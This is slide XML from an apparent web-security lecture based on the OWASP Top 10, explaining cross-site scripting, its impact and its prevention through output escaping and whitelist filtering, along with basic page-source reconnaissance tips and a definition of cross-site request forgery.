              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE53FA0E-D684-EC8C-F3C8-B2096CEA7FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cross-Site Scripting (XSS) Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659459" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E89DBEA-C30D-B14B-D5DF-6297A22AF898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Malicious code that can change the look and function of a legitimate web application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Originates from old phishing attacks but less obvious and more dangerous to the user/victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>More widespread now because of move to more rich Internet applications using dynamic content and JavaScript and the latest AJAX trend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B334E398-ED84-28F2-2A0E-7E439A9558A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Websites XSS’d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765955" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E6B6710-2B2D-0E6C-15E6-D32ACABDE1B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>A hacker was able to insert JavaScript code into the Obama community blog section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>The JavaScript would redirect the users to the Hillary Clinton website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Read about it on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ChannelWeb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Websites from FBI.gov, CNN.com, Time.com, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Ebay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>, Yahoo, Apple computer, Microsoft, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Zdnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>, Wired, and Newsbytes have all had XSS bugs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C05DBC-8ADD-A809-9B25-C09E1940E77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cross-Site Scripting (XSS) Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71741CC2-AF4D-935E-A372-971314989C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="731139" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAD940D-3433-CC07-56DA-A2CBE3B14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023" y="1934361"/>
            <a:ext cx="5184775"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302678A5-D21A-C60F-F5FD-F2BC394CAEEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The Impact of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662531" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F30A71-F531-D9A6-EE12-4F2EEF004AB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Data residing on the web page can be sent anywhere in the world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Including cookies!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Facilitates many other types of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Cross-Site Request Forgery (CSRF), Session Attacks (more later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Your site’s behavior can be hijacked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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41127A18-2C14-D2A6-9F88-606B821D2161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Preventing XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="751619" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA66D8B-C81A-671A-5ACD-CF305FEC996F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Escape all user input when it is displayed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Escaping converts the output to harmless html entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> becomes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" err="1"/>
              <a:t>lt;script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>but still displayed as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Java Standard Tag Library (JSTL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" err="1"/>
              <a:t>c:out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>org.apache.commons.lang.StringEscapeUtils</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>NOTE:  Java’s Expression Language (EL) does not escape output!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="28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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5768B3F9-FBDB-8BCB-72F3-68E7F06D922B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Preventing XSS - Continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664579" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF894E5C-7E84-CEA2-708F-02AFA365A492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Ensure your filter uses a white list approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Filters based on blacklisting have historically been flawed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>E.g. Ruby on Rails sanitize method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>New encoding schemes can easily bypass filters that use a blacklist approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Do not accept and reflect unsolicited input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Reflecting every parameter for confirmation pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Printing out the session/request parameters in error pages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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C775CF4-CC39-2088-9E68-DB0BDC1BA714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764931" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18A32F92-78DD-41B9-86EB-CF87E83520C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>From  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Top_10_2007 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11D662D4-E30C-9F49-0FE6-5CBD3A4E94FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Panning for gold</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="909315" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C732C81-A1CF-9B14-0A93-EF2E8FDF911E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>View Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, and look for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>HTML comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>script code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>other sensitive information in code:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>IP/email addresses, SQL queries, hidden fields,...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>watch HTTP requests/responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>look for hidden pages, files, parameters to target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>error messages sent to your browser by app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>200: OK	400: Invalid request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>403: Forbidden	404: File not found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>500: Internal server error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="909317" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACE86FDA-EEDB-DD9D-C846-AA517EE40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9167"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7959667" y="135017"/>
            <a:ext cx="3087744" cy="658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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1152F38-910D-3FFE-B207-BB8EAD0BEB09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666627" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{748D054A-B793-0E94-5B1C-E8ED3A073733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Occurs when an authenticated user unknowingly initiates a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The request is handled as if it were intentional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Usually happens without the user being aware!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
